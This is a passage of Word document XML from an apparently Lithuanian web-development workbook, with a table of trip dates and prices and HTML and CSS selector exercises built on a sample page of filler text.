    <w:p w:rsidR="000262D2" w:rsidRPr="00AD4464" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kelionių datos</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2872"/>
        <w:gridCol w:w="1285"/>
        <w:gridCol w:w="1125"/>
      </w:tblGrid>
      <w:tr w:rsidR="000262D2" w:rsidRPr="00AD4464" w:rsidTr="000262D2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="000262D2" w:rsidRPr="00AD4464" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
            <w:pPr>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="000262D2" w:rsidRPr="00AD4464" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
            <w:pPr>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Kryptis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="000262D2" w:rsidRPr="00AD4464" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
            <w:pPr>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Kaina</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000262D2" w:rsidRPr="00AD4464" w:rsidTr="000262D2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="000262D2" w:rsidRPr="00AD4464" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
            <w:pPr>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Rugsėjo 18 - Rugsėjo 28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="000262D2" w:rsidRPr="00AD4464" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
            <w:pPr>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Turkija</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="000262D2" w:rsidRPr="00AD4464" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
            <w:pPr>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>345 €</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000262D2" w:rsidRPr="00AD4464" w:rsidTr="000262D2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="000262D2" w:rsidRPr="00AD4464" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
            <w:pPr>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Rugsėjo 20 - Rugsėjo 25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="000262D2" w:rsidRPr="00AD4464" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
            <w:pPr>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Kipras</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="000262D2" w:rsidRPr="00AD4464" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
            <w:pPr>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>299 €</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>-----------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:keepNext w:val="0"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PATEIKTI TURINĮ HTML ŽYMĖJIMO KALBA (NAUJIENŲ SRAUTAS)</w:t>
      </w:r>
      <w:r w:rsidR="008A4AC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>UŽDUOTIES SĄLYGA: naudojant HTML antraščių, pastraipos, sąrašų ir kitus elementus, sukurti vieno puslapio tinklalapį su vidinėmis nuorodomis. Tinklapio turinys: laisvas pasirinkimas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Reikalavimai: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00647658" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00654BEC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000262D2" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t>Failų pavadinimai: index.html;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A053CB" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="003615C0">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000262D2" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t>Grafiniai vaizdai saugomi aplanke, pavadinimu IMG.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00BC29F9" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidR="000262D2" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t>Turinį gaubti į struktūrinius elementus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:before="360" w:after="160"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc10443955"/>
      <w:bookmarkStart w:id="22" w:name="_Toc13095504"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="23" w:name="_Toc13833399"/>
      <w:bookmarkStart w:id="24" w:name="_Toc14392418"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Apipavidalinti internetinį puslapį naudojant pakopinius stilių šablonus ir karkasus.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>
      <w:bookmarkEnd w:id="23"/>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:keepNext w:val="0"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1 užduotis.</w:t>
      </w:r>
      <w:r w:rsidR="00430FE4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> UŽRAŠYKITE</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSS STILIAUS TAISYKLES (CSS SELEKTORIAI)</w:t>
      </w:r>
      <w:r w:rsidR="008A4AC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t>UŽDUOTIES SĄLYGA: naudojant skirtingas CSS selektorių kategorijas, aprašyti antraščių, pastraipų ir kt. elementų nurodytus stilius. Duoti failai:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="007A031A" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="007A031A" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="006B57C0" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000262D2" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t>HTML (index.html)</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tm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eta charset="UTF-8"&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title&gt;Selectors Exercise&lt;/tit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lastRenderedPageBreak/>
        <w:t>&lt;body&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1&gt;Selectors Exercise&lt;/h1&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PARAGRAPH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 class="hello"&gt;I am a paragraph with a class&lt;/p&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 id="special"&gt;I am a paragraph with an ID&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gt;I am an awesome h2 &lt;/h2&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I am an awesome h3 &lt;/h3&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 id="special2"&gt;Roof party yr hella synth, Wes Anderson narwhal four dollar toast before they sold out retro lo-fi. Austin iPhone pop-up farm-to-table, PBR McSweeney's ennui messenger bag distillery before they sold out Portland wolf fanny pack YOLO. Locavore slow-carb trust fund farm-to-table. Pinterest gastropub lo-fi, McSweeney's trust fund VHS shabby chic ugh Austin twee. Messenger bag banjo lumbersexual, whatever 3 wolf moon &lt;span&gt;XOXO (red)&lt;/span&gt; normcore. Pug fanny pack 3 wolf moon, typewriter organic chia mustache scenester seitan shabby chic Blue Bottle salvia ugh iPhone. Fanny pack Williamsburg direct trade, cold-pressed disrupt flannel listicle health goth asymmetrical freegan mixtape street art pour-over whatever.&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gt;Things I need to do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alk Dog &lt;input type="checkbox" checked&gt;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Feed Dog &lt;input type="checkbox" checked&gt;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ash Dog &lt;input type="checkbox"&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 class="hello"&gt;I am another awesome h2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Cardigan Tumblr mlkshk, fap tilde 3 wolf moon Portland. Heirloom health goth taxidermy blog lo-fi selfies, post-ironic master cleanse fingerstache normcore. Kickstarter plaid twee, bespoke single-origin coffee sustainable lo-fi vinyl Pinterest pork belly &lt;em&gt;cronut skateboard&lt;/em&gt; 3 wolf moon. Normcore single-origin coffee salvia, bespoke Austin swag Godard before they sold out kogi disrupt locavore. Lumbersexual Shoreditch Vice, artisan American Apparel master cleanse yr salvia vegan. Bespoke letterpress &lt;span&gt;XOXO&lt;/span&gt; heirloom kale chips deep v four loko. Lomo sustainable put a bird on it trust fund post-ironic&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I'm the second paragraph inside this div!&lt;/p&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PARAGRAPH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gt;A less awesome h2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Roof party yr hella synth, Wes Anderson narwhal four dollar toast before they sold out retro lo-fi. Austin iPhone pop-up farm-to-table, PBR&amp;B McSweeney's ennui messenger bag distillery before they sold out Portland wolf fanny pack YOLO. Locavore slow-carb trust fund farm-to-table. Pinterest gastropub lo-fi, McSweeney's trust fund VHS shabby chic ugh Austin twee. Messenger bag banjo lumbersexual, whatever 3 wolf moon XOXO normcore. Pug fanny pack 3 wolf moon, typewriter organic chia mustache scenester seitan shabby chic Blue Bottle salvia ugh iPhone. Fanny pack Williamsburg direct trade, cold-pressed disrupt flannel listicle health goth asymmetrical freegan mixtape street art pour-over whatever&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One last paragraph here!&lt;/p&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 Lis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Dog</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Dog Dog&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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    &lt;li&gt;Dog Dog&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 Cat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 Mous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PARAGRAPH NOT INSIDE A DIV&lt;/p&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 List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Dog</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Dog Dog&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Dog Dog&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 Cat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 Mous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Mouse Mous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tml&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00203746" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="720" w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="003A7CAE" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000262D2" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t>CSS (style.css)</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xml:space="preserv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xml:space="preserve">Style the HTML elements according to the following instructions.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WRITE ONLY CSS!</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Give the &lt;body&gt; element a background of lightgray*/</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lt;body&gt; elemento fono spalva: lightgray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Make the &lt;h1&gt; element purpl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lt;h1&gt; elemento spalva: purpl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Make all &lt;h2&gt; and &lt;h3&gt; elements orang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Visų &lt;h2&gt; ir &lt;h3&gt; elementu spalva: orange*/</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Make all the &lt;p&gt;'s that are nested inside of divs 25px font(font-size: 25px)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Visų &lt;p&gt; elementų, esančių &lt;div&gt; elemente, šrifto dydis: 25px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Give everything with the class 'hello' a white background*/</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Visų elementų, turinčių klasę "hello", fono spalva: white*/</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Give the element with id 'special' a 2px solid blue border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lastRenderedPageBreak/>
        <w:t>/* Elemento, turinčio id "special", rėmelis (border): 2px solid blu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Make the &lt;span&gt; element in &lt;p&gt; element with id 'special2' a 2px solid red border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lt;span&gt; elemento, esančio &lt;p&gt; elemente su id "special2", rėmelis: 2px solid red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sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>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Change the style of multilevel list in &lt;div&gt; element: first level of list darkblue, second - pupple */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>/* Kelių lygių sąrašo, esančio div elemente, pirmojo lygmens spalva: darkblue, antrojo: pupple */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Reikalavimai: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00D6534B" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00C55973" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001B7193" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000262D2" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t>HTML dokumente, HEAD dalyje, įterpti nuorodą į CSS failą.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0073275B" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00E4689F" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="000262D2" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t>CSS faile aprašyti stiliaus taisykles pagal reikalavimus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2 užduotis.</w:t>
      </w:r>
      <w:r w:rsidR="00BA3291">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> UŽRAŠYKITE </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>CSS STILIAUS TAISYKLES (RECEPTAI)</w:t>
      </w:r>
      <w:r w:rsidR="008A4AC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t>UŽDUOTIES SĄLYGA: naudojant skirtingas CSS selektorių kategorijas, aprašyti antraščių, pastraipų ir kt. elementų nurodytus stilius. Duoti failai:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
